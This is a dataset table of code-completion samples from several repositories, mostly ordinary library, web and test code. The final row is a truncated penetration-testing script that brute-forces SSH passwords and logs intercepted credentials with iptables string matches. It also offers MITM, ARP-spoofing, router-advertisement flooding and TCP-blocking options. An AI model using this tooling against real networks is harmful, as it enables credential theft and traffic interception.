| repo_name (string, 5-100 chars) | path (string, 4-231 chars) | language (1 class) | license (15 classes) | size (int64, 6-947k) | score (float64, 0-0.34) | prefix (string, 0-8.16k chars) | middle (string, 3-512 chars) | suffix (string, 0-8.17k chars) |
|---|---|---|---|---|---|---|---|---|
garimamalhotra/davitpy | pydarn/proc/music/__init__.py | Python | gpl-3.0 | 678 | 0.00885 |
# Waver module __init__.
|
py
"""
*******************************
WAVER
*******************************
This subpackage contains various utilities for WAVER,
the SuperDARN Wave Analysis Software Package.
DEV: functions/modules/classes with a * have not been developed yet
*******************************
"""
#import sigio
from music import *
#from signal import *
#from sigproc import *
#from compare import *
#from xcor impor
|
t *
#
#
# *************************************************************
# Define a few general-use constants
# Mean Earth radius [km]
Re = 6371.0
# Polar Earth radius [km]
RePol = 6356.7523
# Equatorial Earth radius [km]
ReEqu = 6378.1370
|
PritishC/nereid | trytond_nereid/party.py | Python | gpl-3.0 | 12,239 | 0.000163 |
# This file is part of Tryton. The COPYRIGHT file at the top level of
# this repository contains the full copyright notices and license terms.
import warnings
from flask_wtf import Form
from wtforms import TextField, IntegerField, SelectField, validators
from werkzeug import redirect, abort
from jinja2 import TemplateNotFound
from nereid import request, url_for, render_template, login_required, flash, \
jsonify, route, current_user
from trytond.model import ModelView, ModelSQL, fields
from trytond.pool import Pool, PoolMeta
from trytond.transaction import Transaction
from trytond import backend
from sql import As, Literal, Column
from .user import RegistrationForm
from .i18n import _
__all__ = ['Address', 'Party', 'ContactMechanism']
class AddressForm(Form):
"""
A form resembling the party.address
"""
name = TextField(_('Name'), [validators.Required(), ])
street = TextField(_('Street'), [validators.Required(), ])
streetbis = TextField(_('Street (Bis)'))
zip = TextField(_('Post Code'), [validators.Required(), ])
city = TextField(_('City'), [validators.Required(), ])
country = SelectField(_('Country'), [validators.Required(), ], coerce=int)
subdivision = IntegerField(_('State/County'), [validators.Required()])
email = TextField(_('Email'))
phone = TextField(_('Phone'))
def __init__(self, formdata=None, obj=None, prefix='', **kwargs):
super(AddressForm, self).__init__(formdata, obj, prefix, **kwargs)
# Fill country choices while form is initialized
self.country.choices = [
(c.id, c.name) for c in request.nereid_website.countries
]
class Address:
"""Party Address"""
__name__ = 'party.address'
__metaclass__ = PoolMeta
registration_f
|
orm = RegistrationForm
@classmethod
def __register__(cls, module_name):
pool = Pool()
Party = pool.get('party.party')
Con
|
tactMechanism = pool.get('party.contact_mechanism')
TableHandler = backend.get('TableHandler')
cursor = Transaction().cursor
table = TableHandler(cursor, cls, module_name)
party = Party.__table__()
address = cls.__table__()
mechanism = ContactMechanism.__table__()
super(Address, cls).__register__(module_name)
# Migration from 2.8: move phone and email to contact mechanisms
for column in ['email', 'phone']:
if table.column_exist(column):
join = address.join(
party, condition=(party.id == address.party)
)
select = join.select(
address.create_date, address.create_uid,
address.write_date, address.write_uid,
As(Literal(column), 'type'),
As(Column(address, column), 'value'), address.party,
As(Literal(True), 'active'),
where=(Column(address, column) != '')
)
insert = mechanism.insert(
columns=[
mechanism.create_date,
mechanism.create_uid, mechanism.write_date,
mechanism.write_uid, mechanism.type,
mechanism.value, mechanism.party, mechanism.active,
], values=select)
cursor.execute(*insert)
table.column_rename(column, '%s_deprecated' % column)
@classmethod
def get_address_form(cls, address=None):
"""
Return an initialised Address form that can be validated and used to
create/update addresses
:param address: If an active record is provided it is used to autofill
the form.
"""
if address:
form = AddressForm(
request.form,
name=address.name,
street=address.street,
streetbis=address.streetbis,
zip=address.zip,
city=address.city,
country=address.country and address.country.id,
subdivision=address.subdivision and address.subdivision.id,
email=address.party.email,
phone=address.party.phone
)
else:
address_name = "" if request.nereid_user.is_anonymous() else \
request.nereid_user.display_name
form = AddressForm(request.form, name=address_name)
return form
@classmethod
@route("/create-address", methods=["GET", "POST"])
@login_required
def create_address(cls):
"""
Create an address for the current nereid_user
GET
~~~
Return an address creation form
POST
~~~~
Creates an address and redirects to the address view. If a next_url
is provided, redirects there.
.. versionadded:: 3.0.3.0
"""
form = cls.get_address_form()
if request.method == 'POST' and form.validate():
party = request.nereid_user.party
address, = cls.create([{
'name': form.name.data,
'street': form.street.data,
'streetbis': form.streetbis.data,
'zip': form.zip.data,
'city': form.city.data,
'country': form.country.data,
'subdivision': form.subdivision.data,
'party': party.id,
}])
if form.email.data:
party.add_contact_mechanism_if_not_exists(
'email', form.email.data
)
if form.phone.data:
party.add_contact_mechanism_if_not_exists(
'phone', form.phone.data
)
return redirect(url_for('party.address.view_address'))
try:
return render_template('address-add.jinja', form=form)
except TemplateNotFound:
# The address-add template was introduced in 3.0.3.0
# so just raise a deprecation warning till 3.2.X and then
# expect the use of address-add template
warnings.warn(
"address-add.jinja template not found. "
"Will be required in future versions",
DeprecationWarning
)
return render_template('address-edit.jinja', form=form)
@classmethod
@route("/save-new-address", methods=["GET", "POST"])
@route("/edit-address/<int:address>", methods=["GET", "POST"])
@login_required
def edit_address(cls, address=None):
"""
Edit an Address
POST will update an existing address.
GET will return an existing address edit form.
.. versionchanged:: 3.0.3.0
For creating a new address, use the create_address handler instead of
this one. This functionality will be deprecated in 3.2.X
:param address: ID of the address
"""
if address is None:
warnings.warn(
"Address creation will be deprecated from edit_address handler."
" Use party.address.create_address instead",
DeprecationWarning
)
return cls.create_address()
form = cls.get_address_form()
if address not in (a.id for a in request.nereid_user.party.addresses):
# Check if the address is in the list of addresses of the
# current user's party
abort(403)
address = cls(address)
if request.method == 'POST' and form.validate():
party = request.nereid_user.party
cls.write([address], {
'name': form.name.data,
'street': form.street.data,
'streetbis': form.streetbis.data,
'zip': form.zip.data,
'city': form.city.data,
'country': form.country.data,
'subdivision': form.subdivision.data,
})
if form.email.data:
party.add_contact_mechanism_if_not_exists(
'email', form.email.
|
CenterForOpenScience/waterbutler | tests/providers/osfstorage/test_exceptions.py | Python | apache-2.0 | 803 | 0.007472 |
import pytest
from waterbutler.providers.osfstorage.exceptions import OsfStorageQuotaExceededError
class TestExceptionSerialization:
@pytest.mark.parametrize(
'exception_class',
[(OsfStorageQuotaExceededError),]
)
def test_tolerate_dumb_signature(self, exception_class):
"""In order for WaterButlerError-inheriting exceptions to survive pickling/unpickling, it is
necessary for them to be able to be instantiated with a single integer arg. The reasons for
this are described in the docstring for `waterbutler.core.exceptions.WaterButlerError`.
"""
try:
i_live_but_why = exception_class(616)
except Exceptio
|
n as exc:
pytest.fail(str(exc))
assert isinstance(i_live_bu
|
t_why, exception_class)
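def test_pickle_roundtrip_sketch():
    # Added sketch, not part of the original test file: the docstring above states that
    # WaterButlerError subclasses must be constructible from a single integer arg so they
    # survive pickling/unpickling. A minimal round-trip under that assumption:
    import pickle
    original = OsfStorageQuotaExceededError(616)
    restored = pickle.loads(pickle.dumps(original))
    assert isinstance(restored, OsfStorageQuotaExceededError)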
|
bolkedebruin/airflow | airflow/providers/google/cloud/hooks/kubernetes_engine.py | Python | apache-2.0 | 10,778 | 0.002227 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""
This module contains a Google Kubernetes Engine Hook.
.. spelling::
gapic
enums
"""
import time
import warnings
from typing import Dict, Optional, Sequence, Union
from google.api_core.exceptions import AlreadyExists, NotFound
from google.api_core.gapic_v1.method import DEFAULT
from google.api_core.retry import Retry
# not sure why but mypy complains on missing `container_v1` but it is clearly there and is importable
from google.cloud import container_v1, exceptions # type: ignore[attr-defined]
from google.cloud.container_v1.gapic.enums import Operation
from google.cloud.container_v1.types import Cluster
from google.protobuf.json_format import ParseDict
from airflow import version
from airflow.exceptions import AirflowException
from airflow.providers.google.common.consts import CLIENT_INFO
from airflow.providers.google.common.hooks.base_google import PROVIDE_PROJECT_ID, GoogleBaseHook
OPERATIONAL_POLL_INTERVAL = 15
class GKEHook(GoogleBaseHook):
"""
Hook for Google Kubernetes Engine APIs.
All the methods in the hook where project_id is used must be called with
keyword arguments rather than positional.
"""
def __init__(
self,
gcp_conn_id: str = "google_cloud_default",
delegate_to: Optional[str] = None,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
) -> None:
super().__init__(
gcp_conn_id=gcp_conn_id,
delegate_to=delegate_to,
impersonation_chain=impersonation_chain,
)
self._client = None
self.location = location
def get_conn(self) -> container_v1.ClusterManagerClient:
"""
Returns ClusterManagerClient object.
:rtype: google.cloud.container_v1.ClusterManagerClient
"""
if self._client is None:
credentials = self._get_credentials()
self._client = container_v1.ClusterManagerClient(credentials=credentials, client_info=CLIENT_INFO)
return self._client
# To preserve backward compatibility
# TODO: remove one day
def get_client(self) -> container_v1.ClusterManagerClient:
warnings.warn(
"The get_client method has been deprecated. You should use the get_conn method.",
DeprecationWarning,
)
return self.get_conn()
def wait_for_operation(self, operation: Operation, project_id: Optional[str] = None) -> Operation:
"""
Given an operation, continuously fetches its status from Google Cloud until it either
completes or an error occurs
:param operation: The Operation to wait for
:param project_id: Google Cloud project ID
:return: A new, updated operation fetched from Google Cloud
"""
self.log.info("Waiting for OPERATION_NAME %s", operation.name)
time.sleep(OPERATIONAL_POLL_INTERVAL)
while operation.status != Operation.Status.DONE:
if operation.status == Operation.Status.RUNNING or operation.status == Operation.Status.PENDING:
time.sleep(OPERATIONAL_POLL_INTERVAL)
else:
raise exceptions.GoogleCloudError(f"Operation has failed with status: {operation.status}")
# To update status of operation
operation = self.get_operation(operation.name, project_id=project_id or self.project_id)
return operation
def get_operation(self, operation_name: str, project_id: Optional[str] = None) -> Operation:
"""
Fetches the operation from Google Cloud
:param operation_name: Name of operation to fetch
:param project_id: Google Cloud project ID
:return: The new, updated operation from Google Cloud
"""
return self.get_conn().get_operation(
name=f'projects/{project_id or self.project_id}'
+ f'/locations/{self.location}/operations/{operation_name}'
)
@staticmethod
def _append_label(cluster_proto: Cluster, key: str, val: str) -> Cluster:
"""
Append labels to provided Cluster Protobuf
Labels must fit the regex ``[a-z]([-a-z0-9]*[a-z0-9])?`` (current
airflow version string follows semantic versioning spec: x.y.z).
:param cluster_proto: The proto to append resource_label airflow
version to
:param
|
key: The key label
:param val: The label value
:return: The cluster proto updated with new label
"""
val = val.replace('.', '-').replace('+', '-')
cluster_proto.resource_labels.update({key: val})
return cluster_proto
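# Added note (not in the original file): for example, calling
# _append_label(cluster_proto, "airflow-version", "2.3.0+astro") would store
# resource_labels {"airflow-version": "2-3-0-astro"}, since '.' and '+' are replaced
# with '-' to satisfy the [a-z]([-a-z0-9]*[a-z0-9])? label constraint quoted above.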
@GoogleBaseHook.fallbac
|
k_to_default_project_id
def delete_cluster(
self,
name: str,
project_id: str = PROVIDE_PROJECT_ID,
retry: Retry = DEFAULT,
timeout: float = DEFAULT,
) -> Optional[str]:
"""
Deletes the cluster, including the Kubernetes endpoint and all
worker nodes. Firewalls and routes that were configured during
cluster creation are also deleted. Other Google Compute Engine
resources that might be in use by the cluster (e.g. load balancer
resources) will not be deleted if they were not present at the
initial create time.
:param name: The name of the cluster to delete
:param project_id: Google Cloud project ID
:param retry: Retry object used to determine when/if to retry requests.
If None is specified, requests will not be retried.
:param timeout: The amount of time, in seconds, to wait for the request to
complete. Note that if retry is specified, the timeout applies to each
individual attempt.
:return: The full url to the delete operation if successful, else None
"""
self.log.info("Deleting (project_id=%s, location=%s, cluster_id=%s)", project_id, self.location, name)
try:
resource = self.get_conn().delete_cluster(
name=f'projects/{project_id}/locations/{self.location}/clusters/{name}',
retry=retry,
timeout=timeout,
)
resource = self.wait_for_operation(resource)
# Returns server-defined url for the resource
return resource.self_link
except NotFound as error:
self.log.info('Assuming Success: %s', error.message)
return None
@GoogleBaseHook.fallback_to_default_project_id
def create_cluster(
self,
cluster: Union[Dict, Cluster],
project_id: str = PROVIDE_PROJECT_ID,
retry: Retry = DEFAULT,
timeout: float = DEFAULT,
) -> str:
"""
Creates a cluster, consisting of the specified number and type of Google Compute
Engine instances.
:param cluster: A Cluster protobuf or dict. If dict is provided, it must
be of the same form as the protobuf message
:class:`google.cloud.container_v1.types.Cluster`
:param project_id: Google Cloud project ID
:param retry: A retry object (``google.api_core.retry.Retry``) used to
retry requests.
If None is specified, requests will not be retried.
:param timeout: The amount of time, in seconds, to wait for the request to
complete. Note that if retry is specifie
|
habibutsu/rc-car | rc_car/vechicle.py | Python | mit | 3,174 | 0 |
import asyncio
import logging
import os
import signal
from collections import defaultdict
import aiohttp.web
from aiohttp_index import IndexMiddleware
logger = logging.getLogger('rc-car.vechicle')
class Vechicle:
DEFAULT_CFG = {}
de
|
f __init__(self, cfg=None, loop=None):
self.loop = loop or asyncio.get_event_loop()
self.cfg = cfg
if self.cfg.model.use_mock:
logger.info('Use mock-factory...')
|
os.environ['GPIOZERO_PIN_FACTORY'] = 'mock'
from gpiozero.pins.mock import MockPWMPin
from gpiozero import Device
Device.pin_factory.pin_class = MockPWMPin
self.commands = defaultdict(list)
self.sensors = defaultdict(list)
self.parameters = defaultdict(list)
self.components = {}
self.init_signals()
self.init_aiohttp_app()
def init_signals(self):
for sig in ('SIGINT', 'SIGTERM'):
self.loop.add_signal_handler(getattr(signal, sig), self.stop)
self.loop.add_signal_handler(signal.SIGHUP, self.reload)
signal.siginterrupt(signal.SIGTERM, False)
def init_aiohttp_app(self):
self.aiohttp_app = aiohttp.web.Application(
loop=self.loop,
middlewares=[
IndexMiddleware()
]
)
self.aiohttp_app['server'] = self
def stop(self):
logger.info('Stopping server...')
async def stop():
app = self.aiohttp_app
if 'http' in app:
srv = app['http']['srv']
handler = app['http']['handler']
srv.close()
await srv.wait_closed()
await handler.shutdown(self.cfg.server.shutdown_timeout)
await app.shutdown()
await app.cleanup()
self.loop.stop()
return self.loop.create_task(stop())
def reload(self):
logger.info('Handle SIGHUP')
def add_component(self, name, component):
component.register(self)
self.components[name] = component
def get_state(self):
sensors = {
name: value()
for name, value in self.sensors.items()
}
parameters = {
name: value()
for name, value in self.parameters.items()
}
return {
'sensors': sensors,
'parameters': parameters
}
def run_forever(self):
async def init():
handler = self.aiohttp_app.make_handler()
srv = await self.loop.create_server(
handler,
host=self.cfg.server.host,
port=self.cfg.server.port,
backlog=self.cfg.server.backlog
)
self.aiohttp_app['http'] = {
'handler': handler,
'srv': srv
}
self.loop.run_until_complete(init())
logger.info(
'Service started on %s:%s with pid %s',
self.cfg.server.host, self.cfg.server.port, os.getpid())
try:
self.loop.run_forever()
finally:
logger.info('Server was stopped')
|
LouisPlisso/analysis_tools | latex_directory_1_2.py | Python | gpl-3.0 | 5,070 | 0.002959 |
#!/usr/bin/env python
"Module to aggregate all pdf figures of a directory \
into a single latex file, and compile it."
from __future__ import division, print_function
import os
import sys
import re
from optparse import OptionParser
_VERSION = '1.0'
def latex_dir(outfile_name, directory, column=2, eps=False):
"Print latex source file"
print(directory)
with open(outfile_name, 'w') as outfile:
outfile.write(r"""\documentclass[10pt]{article}
\usepackage[T1]{fontenc}
\usepackage[utf8x]{inputenc}
\usepackage{fancyhdr}
\def\goodgap{\hspace{\subfigtopskip}\hspace{\subfigbottomskip}}
\usepackage%(include_pdf_package_option)s{graphicx}
\usepackage{subfigure,a4wide}
%%set dimensions of columns, gap between columns, and paragraph indent
\setlength{\textheight}{8in}
%%\setlength{\textheight}{9.3in}
\setlength{\voffset}{0.5in}
\setlength{\topmargin}{-0.55in}
%%\setlength{\topmargin}{0in}
\setlength{\headheight}{12.0pt}
%%\setlength{\headsep}{0.0in}
%%\setlength{\textwidth}{7.43in}
\setlength{\textwidth}{7.10in}
%%\setlength{\textwidth}{6in}
\setlength{\hoffset}{-0.4in}
\setlength{\columnsep}{0.25in}
\setlength{\oddsidemargin}{0.0in}
\setlength{\evensidemargin}{0.0in}
%% more than .95 of text and figures
\def\topfraction{.95}
\def\floatpagefraction{.95}
\def\textfraction{.05}
\newcommand{\mydefaultheadersandfooters}
{
\chead{\today}
\rhead{\thepage}
\lfoot{}
\cfoot{}
\rfoot{}
}
\title{Automatically generated latex for directory %(title)s}
\author{%(login)s}
\begin{document}
\pagestyle{fancy}
\mydefaultheadersandfooters
\maketitle
\clearpage
""" % {'title': directory.replace('_', '\_'),
'login': os.getenv('L
|
OGNAME').capitalize(),
'include_pdf_package_option': '' if eps else '[pdftex]'})
files = os.listdir(os.getcwd() + '/' + directory)
# exclude_filename = outfile.name.split('/'
|
)[-1].replace('.tex', '.pdf')
exclude_filename = 'latex_dir_'
pattern = re.compile(r'(?!%s)\S+\.%s' % (exclude_filename,
('eps' if eps else 'pdf')))
count = 0
if column == 1:
line_size = .99
elif column == 2:
line_size = .49
else:
print("invalid column size")
raise
nb_floats = 0
for cur_file in sorted(files):
if pattern.match(cur_file):
nb_floats += 1
if column == 1 or count % 2 == 0:
outfile.write(r"\begin{figure}[!ht]"
r"\begin{center}")
outfile.write(r"\subfigure[]{\includegraphics" +
r"[width=%f\textwidth,height=%f\textheight]{%s/%s}}"
% (line_size, .7*line_size, directory, cur_file))
if column == 1 or count % 2 != 0:
outfile.write('\n' + r"\caption{}\end{center}\end{figure}"
+ '\n')
if nb_floats >= 4:
outfile.write(r"\clearpage")
nb_floats = 0
elif count % 2 == 0:
# outfile.write('\goodgap')
pass
else:
print("Double column and modulo is not working on count: %d"
% count)
raise
count += 1
if count % 2 == 1:
outfile.write('\n' + r"\caption{}\end{center}\end{figure}" + '\n')
outfile.write(r"\end{document}")
def main():
"Option parsing and launch latex_dir"
usage = "%prog [-c nb_of_columns -w outtexfile] directory_list"
parser = OptionParser(usage = usage)
parser.add_option('-w', dest='outtexfile', type='string',
help='output latex file (default is dir/latex_dir.tex)')
parser.add_option('-c', dest='column', type='int', default = 2,
help='number of columns of latex file: 1 or 2')
parser.add_option('--eps', dest='eps', default=False, action='store_true',
help='use eps files instead of pdf')
(options, args) = parser.parse_args()
if not args:
parser.print_help()
exit(5)
for directory in args:
if not options.outtexfile:
outfile_name = os.sep.join((directory,
'latex_dir_%s.tex' % directory))
else:
outfile_name = options.outtexfile
if options.column not in (1, 2):
print("invalid number of columns")
parser.print_help()
exit(5)
latex_dir(outfile_name, directory, options.column, eps=options.eps)
#compile the tex file
if options.eps:
os.execlp('latex', 'latex', '-interaction=nonstopmode',
'-output-directory', directory, outfile_name)
else:
os.execlp('pdflatex', 'pdflatex', '-interaction=nonstopmode',
'-output-directory', directory, outfile_name)
if __name__ == '__main__':
sys.exit(main())
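# Added usage note, not part of the original script. A hypothetical invocation, assuming
# a directory "figs/" of PDF figures and the default two-column layout:
#
#     python latex_directory_1_2.py -c 2 figs
#
# This writes figs/latex_dir_figs.tex and then replaces the current process with pdflatex
# via os.execlp to compile it (or with latex when --eps is given).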
|
pubnative/redash | tests/handlers/test_authentication.py | Python | bsd-2-clause | 2,213 | 0.003163 |
from tests import BaseTestCase
import mock
import time
from redash.models import User
from redash.authentication.account
|
import invite_token
from tests.handlers import get_request, post_request
class TestInvite(BaseTestCase):
def test_expired_invite_token(self):
with mock.patch('time.time') as patched_time:
patched_time.return_value = time.time() - (7 * 24 * 3600) - 10
token = invite_token(self.factory.user)
response = get_request('/invite/{}'.format(token), org=self.factory.org)
s
|
elf.assertEqual(response.status_code, 400)
def test_invalid_invite_token(self):
response = get_request('/invite/badtoken', org=self.factory.org)
self.assertEqual(response.status_code, 400)
def test_valid_token(self):
token = invite_token(self.factory.user)
response = get_request('/invite/{}'.format(token), org=self.factory.org)
self.assertEqual(response.status_code, 200)
def test_already_active_user(self):
pass
class TestInvitePost(BaseTestCase):
def test_empty_password(self):
token = invite_token(self.factory.user)
response = post_request('/invite/{}'.format(token), data={'password': ''}, org=self.factory.org)
self.assertEqual(response.status_code, 400)
def test_invalid_password(self):
token = invite_token(self.factory.user)
response = post_request('/invite/{}'.format(token), data={'password': '1234'}, org=self.factory.org)
self.assertEqual(response.status_code, 400)
def test_bad_token(self):
response = post_request('/invite/{}'.format('jdsnfkjdsnfkj'), data={'password': '1234'}, org=self.factory.org)
self.assertEqual(response.status_code, 400)
def test_already_active_user(self):
pass
def test_valid_password(self):
token = invite_token(self.factory.user)
password = 'test1234'
response = post_request('/invite/{}'.format(token), data={'password': password}, org=self.factory.org)
self.assertEqual(response.status_code, 302)
self.factory.user = User.get_by_id(self.factory.user.id)
self.assertTrue(self.factory.user.verify_password(password))
|
hmrc/service-manager | test/it/test_actions.py | Python | apache-2.0 | 11,909 | 0.002015 |
from servicemanager.actions import actions
from servicemanager.smcontext import SmApplication, SmContext, ServiceManagerException
from servicemanager.smprocess import SmProcess
from servicemanager.service.smplayservice import SmPlayService
from servicemanager.serviceresolver import ServiceResolver
import pytest
from .testbase import TestBase
class TestActions(TestBase):
def test_start_and_stop_one(self):
context = SmContext(SmApplication(self.config_dir_override), None, False, False)
result = actions.start_one(context, "TEST_ONE", False, True, False, None, port=None)
self.assertTrue(result)
self.waitForCondition((lambda: len(context.get_service("TEST_ONE").status())), 1)
context.kill("TEST_ONE", True)
self.assertEqual(context.get_service("TEST_ONE").status(), [])
def test_start_and_stop_one_with_append_args(self):
context = SmContext(SmApplication(self.config_dir_override), None, False, False)
actions.start_one(context, "TEST_FOUR", False, True, False, None, None, ["2"])
self.waitForCondition((lambda: len(context.get_service("TEST_FOUR").status())), 1)
context.kill("TEST_FOUR", True)
self.assertEqual(context.get_service("TEST_FOUR").status(), [])
@pytest.mark.online
def test_dropwizard_from_source(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
servicetostart = "DROPWIZARD_NEXUS_END_TO_END_TEST"
actions.start_and_wait(
service_resolver,
context,
[servicetostart],
False,
False,
False,
None,
port=None,
seconds_to_wait=90,
append_args=None,
)
self.assertIsNotNone(context.get_service(servicetostart).status())
context.kill(servicetostart, True)
self.assertEqual(context.get_service(servicetostart).status(), [])
def test_dropwizard_from_jar(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
self.startFakeNexus()
servicetostart = "DROPWIZARD_NEXUS_END_TO_END_TEST"
actions.start_and_wait(
service_resolver,
context,
[servicetostart],
False,
True,
False,
None,
port=None,
seconds_to_wait=90,
append_args=None,
)
self.assertIsNotNone(context.get_service(servicetostart).status())
context.kill(servicetostart, True)
self.assertEqual(context.get_service(servicetostart).status(), [])
@pytest.mark.online
def test_play_from_source(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
servicetostart = "PLAY_NEXUS_END_TO_END_TEST"
port = None
secondsToWait = 90
append_args = None
actions.start_and_wait(
service_resolver, context, [servicetostart], True, False, False, None, port, secondsToWait, append_args,
)
self.assertIsNotNone(context.get_service(servicetostart).status())
context.kill(servicetostart, True)
self.assertEqual(context.get_service(servicetostart).status(), [])
def test_play_from_default_run_from_source(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
servicetostart = "PLAY_NEXUS_END_TO_END_DEFAULT_SOURCE_TEST"
port = None
secondsToWait = 90
append_args = None
actions.start_and_wait(
service_resolver, context, [servicetostart], False, False, False, None, port, secondsToWait, append_args,
)
self.assertIsNotNone(context.get_service(servicetostart).status())
context.kill(servicetostart, True)
self.assertEqual(context.get_service(servicetostart).status(), [])
def test_play_from_source_default(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
servicetostart = "PLAY_NEXUS_END_TO_END_TEST"
port = None
secondsToWait = 90
append_args = None
actions.start_and_wait(
service_resolver, context, [servicetostart], False, False, False, None, port, secondsToWait, append_args,
)
self.assertIsNotNone(context.get_service(servicetostart).status())
context.kill(servicetostart, True)
self.assertEqual(context.get_service(servicetostart).status(), [])
def test_successful_play_from_jar_without_waiting(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
context.kill_everything(True)
self.startFakeNexus()
fatJar = True
release = False
proxy = None
port = None
seconds_to_wait = None
append_args = None
try:
servicetostart = ["PLAY_NEXUS_END_TO_END_TEST"]
actions.start_and_wait(
service_resolver,
context,
servicetostart,
False,
fatJar,
release,
proxy,
port,
seconds_to_wait,
append_args,
)
finally:
context.kill_everything(True)
def test_successful_play_default_run_from_jar_without_waiting(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
context.kill_everything(True)
self.startFakeNexus()
source = False
fatJar = True
release = False
proxy = None
port = None
seconds_to_wait = None
append_args = None
try:
servicetostart = ["PLAY_NEXUS_END_TO_END_DEFAULT_JAR_TEST"]
actions.start_and_wait(
service_resolver,
context,
servicetostart,
source,
fatJar,
release,
proxy,
port,
seconds_to_wait,
append_args,
)
finally:
context.kill_everything(True)
def test_successful_play_from_jar_without_waiting_with_append_args(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_applicat
|
ion, None, False, False)
service_resolver = ServiceResolver(sm_application)
context.kill_everything(True)
self.startFakeNexus()
servicetostart = ["PLAY_NEXUS_END_TO_END_TEST"]
appendArgs = {"PLAY_NEXUS_END_TO_END_TEST": ["-DFoo=Bar"]}
fatJar = True
r
|
elease = False
proxy = None
port = None
seconds_to_wait = None
actions.start_and_wait(
service_resolver, context, servicetostart, False, fatJar, release, proxy, port, seconds_to_wait, appendArgs,
)
service = SmPlayService(context, "PLAY_NEXUS_END_TO_END_TEST")
self.waitForCondition(lambda: len(SmProcess.processes_matching(service.pattern)), 1)
processes = SmProcess.processes_matching(service.pattern)
self.assertTrue("-DFoo=Bar" in processes[0].args)
def test_failing_play_from_jar(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_a
|
fnzv/Boafi | BoafiPenTest.py | Python | mit | 12,450 | 0.020484 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
########## boafi Pentest script
########## - Perform various pentests automatically and save reports for further study
########## - Features/TODOs: Ipv6,DHCP,DNS,NTP,exploits,mitm..
########## - Router bruteforce for easy guessable passwords
########## - Scan networks hosts and identify vulnerabilities
########## ...
### Author: Yessou Sami
### Project Boafi
## Dependencies: dsniff(arpspoof),paramiko(ssh bruteforce),iptables,scapy
import os,time,argparse,random,paramiko,socket,logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
from datetime import datetime
## Functions
def brute_pass(usr,passwd,ip,port):
print "Trying for "+usr+" - "+passwd
ssh=paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(ip,port,usr,passwd)
print "Password is: ",passwd
open("foundpass","a").write("IP: "+ip+" PORT: "+port+" USER: "+usr+" PASS: "+passwd)
except paramiko.AuthenticationException:
print("Bad Password - "+passwd)
ssh.close()
except socket.error:
print("Failed connection")
ssh.close()
def EnaLogging():
os.popen("iptables -I FORWARD -p all -j LOG --log-prefix 'GENERAL-LOG-'")
#Start Logging every connection to /var/log/messages
#Log also images on /tmp?
os.popen("iptables -I FORWARD -p all -m string --string 'jpg' --algo kmp -j LOG --log-prefix 'JPG-LOG-'")
os.popen("iptables -I FORWARD -p all -m string --string 'gif' --algo kmp -j LOG --log-prefix 'GIF-LOG-'")
os.popen("iptables -I FORWARD -p all -m string --string 'png' --algo kmp -j LOG --log-prefix 'PNG-LOG-'")
os.popen("iptables -I FORWARD -p all -m string --string 'mp4' --algo kmp -j LOG --log-prefix 'mp4-LOG-'")
#Log urls/web request
os.popen("iptables -I FORWARD -p tcp -m multiport --dports 80,443 -j LOG --log-prefix 'WWW-LOG-' ")
#Log DNS
os.popen("iptables -I FORWARD -p udp --dport 53 -j LOG --log-prefix 'DNS-LOG-'")
#Log credentials HTTP
os.popen("iptables -I FORWARD -p all -m string --string 'pass' --algo kmp -j LOG --log-prefix 'PASSWORD-LOG-'")
os.popen("iptables -I FORWARD -p all -m string --string 'user' --algo kmp -j LOG --log-prefix 'USERNAME-LOG-'")
###
parser = argparse.ArgumentParser()
parser.add_argument('-timeout', action='store', dest='timeout', default="none",
help='Define given seconds before the attack timeouts (mitm,scan,stress) if not specified will run until is killed')
parser.add_argument('-RA', action='store', dest='ipv6ra', default=False,
help='Flood ipv6 router advertisements for given minutes')
parser.add_argument('-file', action='store', dest='output', default=False,
help='File output for scans')
parser.add_argument('-scan', action='store', dest='scan', default=False,
help='Scan the given network address or host')
##ArpScan still in betatest.. need to fix scapy responses
parser.add_argument('--arpScan', action='store_true', dest='arpscan', default=False,
help='Arpscan to scan fast on LAN')
parser.add_argument('--syn', action='store_true', dest='syn', default=False,
help='SYN Scan enabled')
parser.add_argument('--service', action='store_true', dest='service', default=False,
help='Service Version detection enabled')
parser.add_argument('-brute', action='store', dest='brute', default="none",
help='Bruteforce SSH of given ip... example : -brute file-192.168.1.254:22')
parser.add_argument('-mitm', action='store', dest='mitm', default="none",
help='Perform MITM Attack on target')
parser.add_a
|
rgument('-mitmAll', action='store', dest='mitmall', default="none",
help='Perform MITM Attack on all hosts')
parser.add_argument('-stop-mitm', action='store_true', dest='stopmitm', default=
|
False,
help='Stop any Running MITM Attack')
parser.add_argument('-denyTcp', action='store', dest='denytcp', default="none",
help='Deny tcp connections of given host')
parser.add_argument('--dg', action='store', dest='dg', default="none",
help='Perform MITM Attack with given Default Gateway')
